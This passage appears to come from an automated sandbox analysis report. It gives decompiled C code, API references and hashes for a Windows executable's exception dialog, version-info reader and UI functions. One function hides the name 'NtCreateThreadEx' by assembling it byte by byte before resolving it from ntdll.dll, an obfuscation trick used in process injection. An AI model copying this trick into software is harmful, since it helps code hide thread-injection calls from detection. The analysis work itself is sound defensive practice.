                                                                                                                                                                                                                          				char _v3628;
                                                                                                                                                                                                                          				void _v5674;
                                                                                                                                                                                                                          				char _v5676;
                                                                                                                                                                                                                          				void _v9770;
                                                                                                                                                                                                                          				short _v9772;
                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                          				void* _t45;
                                                                                                                                                                                                                          				void* _t60;
                                                                                                                                                                                                                          				int _t61;
                                                                                                                                                                                                                          				int _t63;
                                                                                                                                                                                                                          				int _t64;
                                                                                                                                                                                                                          				long _t68;
                                                                                                                                                                                                                          				struct HWND__* _t94;
                                                                                                                                                                                                                          				signed int _t103;
                                                                                                                                                                                                                          				intOrPtr _t127;
                                                                                                                                                                                                                          				unsigned int _t130;
                                                                                                                                                                                                                          				void* _t132;
                                                                                                                                                                                                                          				void* _t135;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				E0040B550(0x2628, __ecx);
                                                                                                                                                                                                                          				_t45 = _a8 - 0x110;
                                                                                                                                                                                                                          				if(_t45 == 0) {
                                                                                                                                                                                                                          					E00404DA9(__edx, _a4, 4);
                                                                                                                                                                                                                          					_v9772 = 0;
                                                                                                                                                                                                                          					memset( &_v9770, 0, 0xffe);
                                                                                                                                                                                                                          					_t103 = 5;
                                                                                                                                                                                                                          					memcpy( &_v1580, L"{Unknown}", _t103 << 2);
                                                                                                                                                                                                                          					memset( &_v1560, 0, 0x1f6);
                                                                                                                                                                                                                          					_v260 = 0;
                                                                                                                                                                                                                          					memset( &_v259, 0, 0xff);
                                                                                                                                                                                                                          					_v516 = 0;
                                                                                                                                                                                                                          					memset( &_v515, 0, 0xff);
                                                                                                                                                                                                                          					_v5676 = 0;
                                                                                                                                                                                                                          					memset( &_v5674, 0, 0x7fe);
                                                                                                                                                                                                                          					_v3628 = 0;
                                                                                                                                                                                                                          					memset( &_v3626, 0, 0x7fe);
                                                                                                                                                                                                                          					_t135 = _t132 + 0x5c;
                                                                                                                                                                                                                          					_t60 = GetCurrentProcess();
                                                                                                                                                                                                                          					_t105 =  &_v260;
                                                                                                                                                                                                                          					_a8 = _t60;
                                                                                                                                                                                                                          					_t61 = ReadProcessMemory(_t60,  *0x40f3bc,  &_v260, 0x80, 0);
                                                                                                                                                                                                                          					__eflags = _t61;
                                                                                                                                                                                                                          					if(_t61 != 0) {
                                                                                                                                                                                                                          						E00404FE0( &_v5676,  &_v260, 4);
                                                                                                                                                                                                                          						_pop(_t105);
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					_t63 = ReadProcessMemory(_a8,  *0x40f3b0,  &_v516, 0x80, 0);
                                                                                                                                                                                                                          					__eflags = _t63;
                                                                                                                                                                                                                          					if(_t63 != 0) {
                                                                                                                                                                                                                          						E00404FE0( &_v3628,  &_v516, 0);
                                                                                                                                                                                                                          						_pop(_t105);
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					_t64 = E00404BD3();
                                                                                                                                                                                                                          					__eflags = _t64;
                                                                                                                                                                                                                          					if(_t64 == 0) {
                                                                                                                                                                                                                          						E004090EE();
                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                          						E00409172();
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					__eflags =  *0x4101b8; // 0x0
                                                                                                                                                                                                                          					if(__eflags != 0) {
                                                                                                                                                                                                                          						L17:
                                                                                                                                                                                                                          						_v1056 = 0;
                                                                                                                                                                                                                          						memset( &_v1052, 0, 0x218);
                                                                                                                                                                                                                          						_t127 =  *0x40f5d4; // 0x0
                                                                                                                                                                                                                          						_t135 = _t135 + 0xc;
                                                                                                                                                                                                                          						_t68 = GetCurrentProcessId();
                                                                                                                                                                                                                          						_push(_t127);
                                                                                                                                                                                                                          						_push(_t68);
                                                                                                                                                                                                                          						 *0x40f84c = 0;
                                                                                                                                                                                                                          						E004092F0(_t105, __eflags);
                                                                                                                                                                                                                          						__eflags =  *0x40f84c; // 0x0
                                                                                                                                                                                                                          						if(__eflags != 0) {
                                                                                                                                                                                                                          							memcpy( &_v1056, 0x40f850, 0x21c);
                                                                                                                                                                                                                          							_t135 = _t135 + 0xc;
                                                                                                                                                                                                                          							__eflags =  *0x40f84c; // 0x0
                                                                                                                                                                                                                          							if(__eflags != 0) {
                                                                                                                                                                                                                          								wcscpy( &_v1580, E00404B3E( &_v1048));
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						goto L20;
                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                          						__eflags =  *0x4101bc; // 0x0
                                                                                                                                                                                                                          						if(__eflags == 0) {
                                                                                                                                                                                                                          							L20:
                                                                                                                                                                                                                          							_push( &_v3628);
                                                                                                                                                                                                                          							_push( &_v5676);
                                                                                                                                                                                                                          							_push( *0x40f3b0);
                                                                                                                                                                                                                          							_push( *0x40f3bc);
                                                                                                                                                                                                                          							_push( *0x40f3ac);
                                                                                                                                                                                                                          							_push( *0x40f394);
                                                                                                                                                                                                                          							_push( *0x40f398);
                                                                                                                                                                                                                          							_push( *0x40f3a0);
                                                                                                                                                                                                                          							_push( *0x40f3a4);
                                                                                                                                                                                                                          							_push( *0x40f39c);
                                                                                                                                                                                                                          							_push( *0x40f3a8);
                                                                                                                                                                                                                          							_push( &_v1580);
                                                                                                                                                                                                                          							_push( *0x40f5d4);
                                                                                                                                                                                                                          							_push( *0x40f5c8);
                                                                                                                                                                                                                          							_push(L"Exception %8.8X at address %8.8X in module %s\r\nRegisters: \r\nEAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8X\r\nESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8X\r\nEIP=%8.8X\r\nStack Data: %s\r\nCode Data: %s\r\n");
                                                                                                                                                                                                                          							_push(0x800);
                                                                                                                                                                                                                          							_push( &_v9772);
                                                                                                                                                                                                                          							L0040B1EC();
                                                                                                                                                                                                                          							SetDlgItemTextW(_a4, 0x3ea,  &_v9772);
                                                                                                                                                                                                                          							SetFocus(GetDlgItem(_a4, 0x3ea));
                                                                                                                                                                                                                          							L21:
                                                                                                                                                                                                                          							return 0;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						goto L17;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				if(_t45 == 1) {
                                                                                                                                                                                                                          					_t130 = _a12;
                                                                                                                                                                                                                          					if(_t130 >> 0x10 == 0) {
                                                                                                                                                                                                                          						if(_t130 == 3) {
                                                                                                                                                                                                                          							_t94 = GetDlgItem(_a4, 0x3ea);
                                                                                                                                                                                                                          							_a4 = _t94;
                                                                                                                                                                                                                          							SendMessageW(_t94, 0xb1, 0, 0xffff);
                                                                                                                                                                                                                          							SendMessageW(_a4, 0x301, 0, 0);
                                                                                                                                                                                                                          							SendMessageW(_a4, 0xb1, 0, 0);
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				goto L21;
                                                                                                                                                                                                                          			}































                                                                                                                                                                                                                          0x00408c1a
                                                                                                                                                                                                                          0x00408c2c
                                                                                                                                                                                                                          0x00408c39
                                                                                                                                                                                                                          0x00408c3d
                                                                                                                                                                                                                          0x00408c3f
                                                                                                                                                                                                                          0x00408c41
                                                                                                                                                                                                                          0x00408c52
                                                                                                                                                                                                                          0x00408c58
                                                                                                                                                                                                                          0x00408c58
                                                                                                                                                                                                                          0x00408c6f
                                                                                                                                                                                                                          0x00408c71
                                                                                                                                                                                                                          0x00408c73
                                                                                                                                                                                                                          0x00408c83
                                                                                                                                                                                                                          0x00408c89
                                                                                                                                                                                                                          0x00408c89
                                                                                                                                                                                                                          0x00408c8a
                                                                                                                                                                                                                          0x00408c8f
                                                                                                                                                                                                                          0x00408c91
                                                                                                                                                                                                                          0x00408c9a
                                                                                                                                                                                                                          0x00408c93
                                                                                                                                                                                                                          0x00408c93
                                                                                                                                                                                                                          0x00408c93
                                                                                                                                                                                                                          0x00408c9f
                                                                                                                                                                                                                          0x00408ca5
                                                                                                                                                                                                                          0x00408caf
                                                                                                                                                                                                                          0x00408cbc
                                                                                                                                                                                                                          0x00408cc2
                                                                                                                                                                                                                          0x00408cc7
                                                                                                                                                                                                                          0x00408ccd
                                                                                                                                                                                                                          0x00408cd0
                                                                                                                                                                                                                          0x00408cd6
                                                                                                                                                                                                                          0x00408cd7
                                                                                                                                                                                                                          0x00408cd8
                                                                                                                                                                                                                          0x00408cde
                                                                                                                                                                                                                          0x00408ce3
                                                                                                                                                                                                                          0x00408ceb
                                                                                                                                                                                                                          0x00408cfe
                                                                                                                                                                                                                          0x00408d03
                                                                                                                                                                                                                          0x00408d06
                                                                                                                                                                                                                          0x00408d0c
                                                                                                                                                                                                                          0x00408d21
                                                                                                                                                                                                                          0x00408d27
                                                                                                                                                                                                                          0x00408d0c
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00408ca7
                                                                                                                                                                                                                          0x00408ca7
                                                                                                                                                                                                                          0x00408cad
                                                                                                                                                                                                                          0x00408d28
                                                                                                                                                                                                                          0x00408d2e
                                                                                                                                                                                                                          0x00408d35
                                                                                                                                                                                                                          0x00408d36
                                                                                                                                                                                                                          0x00408d42
                                                                                                                                                                                                                          0x00408d48
                                                                                                                                                                                                                          0x00408d4e
                                                                                                                                                                                                                          0x00408d54
                                                                                                                                                                                                                          0x00408d5a
                                                                                                                                                                                                                          0x00408d60
                                                                                                                                                                                                                          0x00408d66
                                                                                                                                                                                                                          0x00408d6c
                                                                                                                                                                                                                          0x00408d72
                                                                                                                                                                                                                          0x00408d73
                                                                                                                                                                                                                          0x00408d7f
                                                                                                                                                                                                                          0x00408d85
                                                                                                                                                                                                                          0x00408d8a
                                                                                                                                                                                                                          0x00408d8f
                                                                                                                                                                                                                          0x00408d90
                                                                                                                                                                                                                          0x00408da8
                                                                                                                                                                                                                          0x00408db9
                                                                                                                                                                                                                          0x00408dbf
                                                                                                                                                                                                                          0x00408dc5
                                                                                                                                                                                                                          0x00408dc5
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00408cad
                                                                                                                                                                                                                          0x00408ca5
                                                                                                                                                                                                                          0x00408af6
                                                                                                                                                                                                                          0x00408afc
                                                                                                                                                                                                                          0x00408b07
                                                                                                                                                                                                                          0x00408b2a
                                                                                                                                                                                                                          0x00408b38
                                                                                                                                                                                                                          0x00408b53
                                                                                                                                                                                                                          0x00408b56
                                                                                                                                                                                                                          0x00408b62
                                                                                                                                                                                                                          0x00408b6a
                                                                                                                                                                                                                          0x00408b6a
                                                                                                                                                                                                                          0x00408b2a
                                                                                                                                                                                                                          0x00408b07
                                                                                                                                                                                                                          0x00000000

APIs
Strings
• {Unknown}, xrefs: 00408BA5
• Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00408D85
Memory Dump Source
• Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
• Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
• Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
• Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
Similarity
• API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
• String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
• API String ID: 4111938811-1819279800
• Opcode ID: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
• Instruction ID: 89cdabe1f300c5598f457b205db6f7bf21b56caa474a1127ebd0a37068e91017
• Opcode Fuzzy Hash: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
• Instruction Fuzzy Hash: FD7184B280021DBEDB219B51DD85EDB377CEF08354F0444BAFA08B6191DB799E848F68
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 82%
E0040B04D(intOrPtr* __edi, short* _a4) {
	int _v8;
	void* _v12;
	void* _v16;
	int _v20;
	long _v60;
	char _v572;
	void* __esi;
	int _t47;
	void* _t50;
	signed short* _t76;
	void* _t81;
	void* _t84;
	intOrPtr* _t96;
	int _t97;

	_t96 = __edi;
	_t97 = 0;
	_v20 = 0;
	_t47 = GetFileVersionInfoSizeW(_a4,  &_v20);
	_v8 = _t47;
	if(_t47 > 0) {
		_t50 = E00405AA7(__edi);
		_push(_v8);
		L0040B26C();
		_t84 = _t50;
		GetFileVersionInfoW(_a4, 0, _v8, _t84);
                                                                                                                                                                                                                          					if(VerQueryValueW(_t84, "\\",  &_v12,  &_v8) != 0) {
                                                                                                                                                                                                                          						_t81 = _v12;
                                                                                                                                                                                                                          						_t11 = _t81 + 0x30; // 0x4d46e853
                                                                                                                                                                                                                          						 *((intOrPtr*)(__edi + 4)) =  *_t11;
                                                                                                                                                                                                                          						_t13 = _t81 + 8; // 0x8d50ffff
                                                                                                                                                                                                                          						 *__edi =  *_t13;
                                                                                                                                                                                                                          						_t14 = _t81 + 0x14; // 0x5900004d
                                                                                                                                                                                                                          						 *((intOrPtr*)(__edi + 0xc)) =  *_t14;
                                                                                                                                                                                                                          						_t16 = _t81 + 0x10; // 0x65e850ff
                                                                                                                                                                                                                          						 *((intOrPtr*)(__edi + 8)) =  *_t16;
                                                                                                                                                                                                                          						_t18 = _t81 + 0x24; // 0xf4680000
                                                                                                                                                                                                                          						 *((intOrPtr*)(__edi + 0x10)) =  *_t18;
                                                                                                                                                                                                                          						_t20 = _t81 + 0x28; // 0xbb0040cd
                                                                                                                                                                                                                          						 *((intOrPtr*)(__edi + 0x14)) =  *_t20;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					if(VerQueryValueW(_t84, L"\\VarFileInfo\\Translation",  &_v16,  &_v8) == 0) {
                                                                                                                                                                                                                          						L5:
                                                                                                                                                                                                                          						wcscpy( &_v60, L"040904E4");
                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                          						_t76 = _v16;
                                                                                                                                                                                                                          						_push(_t76[1] & 0x0000ffff);
                                                                                                                                                                                                                          						_push( *_t76 & 0x0000ffff);
                                                                                                                                                                                                                          						_push(L"%4.4X%4.4X");
                                                                                                                                                                                                                          						_push(0x14);
                                                                                                                                                                                                                          						_push( &_v60);
                                                                                                                                                                                                                          						L0040B1EC();
                                                                                                                                                                                                                          						if(E0040AFBE( &_v572, _t84,  &_v60, 0x40c4e8) == 0) {
                                                                                                                                                                                                                          							goto L5;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					E0040AFBE(_t96 + 0x18, _t84,  &_v60, L"ProductName");
                                                                                                                                                                                                                          					E0040AFBE(_t96 + 0x218, _t84,  &_v60, L"FileDescription");
                                                                                                                                                                                                                          					E0040AFBE(_t96 + 0x418, _t84,  &_v60, L"FileVersion");
                                                                                                                                                                                                                          					E0040AFBE(_t96 + 0x618, _t84,  &_v60, L"ProductVersion");
                                                                                                                                                                                                                          					E0040AFBE(_t96 + 0x818, _t84,  &_v60, L"CompanyName");
                                                                                                                                                                                                                          					E0040AFBE(_t96 + 0xa18, _t84,  &_v60, L"InternalName");
                                                                                                                                                                                                                          					E0040AFBE(_t96 + 0xc18, _t84,  &_v60, L"LegalCopyright");
                                                                                                                                                                                                                          					E0040AFBE(_t96 + 0xe18, _t84,  &_v60, L"OriginalFileName");
                                                                                                                                                                                                                          					_push(_t84);
                                                                                                                                                                                                                          					_t97 = 1;
                                                                                                                                                                                                                          					L0040B272();
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return _t97;
                                                                                                                                                                                                                          			}


















                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
                                                                                                                                                                                                                          • GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
                                                                                                                                                                                                                          • VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
                                                                                                                                                                                                                          • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0040B0FE
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040B128
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040B1D8
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileInfoQueryValueVersion$??2@??3@Size_snwprintfwcscpy
                                                                                                                                                                                                                          • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                                                                                                                          • API String ID: 1223191525-1542517562
                                                                                                                                                                                                                          • Opcode ID: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
                                                                                                                                                                                                                          • Instruction ID: 283451b663653e95218ba9e6ce5340ec929c4f2fba7a9b8c11281d5ea0e9195a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E34144B2940219BAC704EBA5DD41DDEB7BDEF08704F100177B905B3181DB78AA59CBD8
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 76%
                                                                                                                                                                                                                          			E0040A1EF(struct HINSTANCE__** __esi) {
                                                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                                                          				char _v9;
                                                                                                                                                                                                                          				char _v10;
                                                                                                                                                                                                                          				char _v11;
                                                                                                                                                                                                                          				char _v12;
                                                                                                                                                                                                                          				char _v13;
                                                                                                                                                                                                                          				char _v14;
                                                                                                                                                                                                                          				char _v15;
                                                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                                                          				char _v17;
                                                                                                                                                                                                                          				char _v18;
                                                                                                                                                                                                                          				char _v19;
                                                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                                                          				char _v21;
                                                                                                                                                                                                                          				char _v22;
                                                                                                                                                                                                                          				char _v23;
                                                                                                                                                                                                                          				char _v24;
                                                                                                                                                                                                                          				struct HINSTANCE__* _t27;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				if( *__esi != 0) {
                                                                                                                                                                                                                          					L3:
                                                                                                                                                                                                                          					return 1;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t27 = LoadLibraryW(L"ntdll.dll");
                                                                                                                                                                                                                          				 *__esi = _t27;
                                                                                                                                                                                                                          				if(_t27 != 0) {
                                                                                                                                                                                                                          					asm("stosd");
                                                                                                                                                                                                                          					asm("stosd");
                                                                                                                                                                                                                          					asm("stosd");
                                                                                                                                                                                                                          					asm("stosd");
                                                                                                                                                                                                                          					asm("stosw");
                                                                                                                                                                                                                          					asm("stosb");
                                                                                                                                                                                                                          					_v24 = 0x4e;
                                                                                                                                                                                                                          					_v23 = 0x74;
                                                                                                                                                                                                                          					_v13 = 0x65;
                                                                                                                                                                                                                          					_v12 = 0x61;
                                                                                                                                                                                                                          					_v18 = 0x74;
                                                                                                                                                                                                                          					_v17 = 0x65;
                                                                                                                                                                                                                          					_v22 = 0x43;
                                                                                                                                                                                                                          					_v14 = 0x72;
                                                                                                                                                                                                                          					_v11 = 0x64;
                                                                                                                                                                                                                          					_v21 = 0x72;
                                                                                                                                                                                                                          					_v10 = 0x45;
                                                                                                                                                                                                                          					_v9 = 0x78;
                                                                                                                                                                                                                          					_v20 = 0x65;
                                                                                                                                                                                                                          					_v19 = 0x61;
                                                                                                                                                                                                                          					_v16 = 0x54;
                                                                                                                                                                                                                          					_v15 = 0x68;
                                                                                                                                                                                                                          					_v8 = 0;
                                                                                                                                                                                                                          					__esi[1] = GetProcAddress(_t27,  &_v24);
                                                                                                                                                                                                                          					goto L3;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return 0;
                                                                                                                                                                                                                          			}






















                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0040A263
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                          • String ID: C$E$N$T$a$a$d$e$e$e$h$ntdll.dll$r$r$t$t$x
                                                                                                                                                                                                                          • API String ID: 2574300362-1257427173
                                                                                                                                                                                                                          • Opcode ID: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
                                                                                                                                                                                                                          • Instruction ID: 28a3addb3bc40b583479f690f9d6e65064931713b616a12c977b5f47a4008353
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 08110A2090C6C9EDEB12C7FCC40879EBEF15B26709F0881ECC585B6292C6BA5758C776
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 63%
                                                                                                                                                                                                                          			E00407F8D(void* __eax) {
                                                                                                                                                                                                                          				struct _SHFILEINFOW _v692;
                                                                                                                                                                                                                          				void _v1214;
                                                                                                                                                                                                                          				short _v1216;
                                                                                                                                                                                                                          				void* _v1244;
                                                                                                                                                                                                                          				void* _v1248;
                                                                                                                                                                                                                          				void* _v1252;
                                                                                                                                                                                                                          				void* _v1256;
                                                                                                                                                                                                                          				void* _v1268;
                                                                                                                                                                                                                          				void* _t37;
                                                                                                                                                                                                                          				long _t38;
                                                                                                                                                                                                                          				long _t46;
                                                                                                                                                                                                                          				long _t48;
                                                                                                                                                                                                                          				long _t58;
                                                                                                                                                                                                                          				void* _t62;
                                                                                                                                                                                                                          				intOrPtr* _t64;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t64 = ImageList_Create;
                                                                                                                                                                                                                          				_t62 = __eax;
                                                                                                                                                                                                                          				if( *((intOrPtr*)(__eax + 0x2b4)) != 0) {
                                                                                                                                                                                                                          					if( *((intOrPtr*)(__eax + 0x2bc)) == 0) {
                                                                                                                                                                                                                          						_t48 = ImageList_Create(0x10, 0x10, 0x19, 1, 1);
                                                                                                                                                                                                                          						 *(_t62 + 0x2a8) = _t48;
                                                                                                                                                                                                                          						__imp__ImageList_SetImageCount(_t48, 0);
                                                                                                                                                                                                                          						_push( *(_t62 + 0x2a8));
                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                          						_v692.hIcon = 0;
                                                                                                                                                                                                                          						memset( &(_v692.iIcon), 0, 0x2b0);
                                                                                                                                                                                                                          						_v1216 = 0;
                                                                                                                                                                                                                          						memset( &_v1214, 0, 0x208);
                                                                                                                                                                                                                          						GetWindowsDirectoryW( &_v1216, 0x104);
                                                                                                                                                                                                                          						_t58 = SHGetFileInfoW( &_v1216, 0,  &_v692, 0x2b4, 0x4001);
                                                                                                                                                                                                                          						 *(_t62 + 0x2a8) = _t58;
                                                                                                                                                                                                                          						_push(_t58);
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					SendMessageW( *(_t62 + 0x2a0), 0x1003, 1, ??);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				if( *((intOrPtr*)(_t62 + 0x2b8)) != 0) {
                                                                                                                                                                                                                          					_t46 =  *_t64(0x20, 0x20, 0x19, 1, 1);
                                                                                                                                                                                                                          					 *(_t62 + 0x2ac) = _t46;
                                                                                                                                                                                                                          					__imp__ImageList_SetImageCount(_t46, 0);
                                                                                                                                                                                                                          					SendMessageW( *(_t62 + 0x2a0), 0x1003, 0,  *(_t62 + 0x2ac));
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				 *(_t62 + 0x2a4) =  *_t64(0x10, 0x10, 0x19, 1, 1);
                                                                                                                                                                                                                          				_v1248 = LoadImageW(GetModuleHandleW(0), 0x85, 0, 0x10, 0x10, 0x1000);
                                                                                                                                                                                                                          				_t37 = LoadImageW(GetModuleHandleW(0), 0x86, 0, 0x10, 0x10, 0x1000);
                                                                                                                                                                                                                          				_v1244 = _t37;
                                                                                                                                                                                                                          				__imp__ImageList_SetImageCount( *(_t62 + 0x2a4), 0);
                                                                                                                                                                                                                          				_t38 = GetSysColor(0xf);
                                                                                                                                                                                                                          				_v1248 = _t38;
                                                                                                                                                                                                                          				ImageList_AddMasked( *(_t62 + 0x2a4), _v1256, _t38);
                                                                                                                                                                                                                          				ImageList_AddMasked( *(_t62 + 0x2a4), _v1252, _v1248);
                                                                                                                                                                                                                          				DeleteObject(_v1268);
                                                                                                                                                                                                                          				DeleteObject(_v1268);
                                                                                                                                                                                                                          				return SendMessageW(E0040331D( *(_t62 + 0x2a0)), 0x1208, 0,  *(_t62 + 0x2a4));
                                                                                                                                                                                                                          			}



















                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00407FD0
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00407FE5
                                                                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00407FF7
                                                                                                                                                                                                                          • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 00408015
                                                                                                                                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040802E
                                                                                                                                                                                                                          • ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 00408038
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001003,00000001,?), ref: 00408051
                                                                                                                                                                                                                          • ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 00408065
                                                                                                                                                                                                                          • ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 0040806F
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001003,00000000,?), ref: 00408087
                                                                                                                                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00408093
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004080A2
                                                                                                                                                                                                                          • LoadImageW.USER32 ref: 004080B4
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004080BF
                                                                                                                                                                                                                          • LoadImageW.USER32 ref: 004080D1
                                                                                                                                                                                                                          • ImageList_SetImageCount.COMCTL32(?,00000000), ref: 004080E2
                                                                                                                                                                                                                          • GetSysColor.USER32(0000000F), ref: 004080EA
                                                                                                                                                                                                                          • ImageList_AddMasked.COMCTL32(?,00000000,00000000), ref: 00408105
                                                                                                                                                                                                                          • ImageList_AddMasked.COMCTL32(?,?,?), ref: 00408115
                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00408121
                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00408127
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 00408144
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
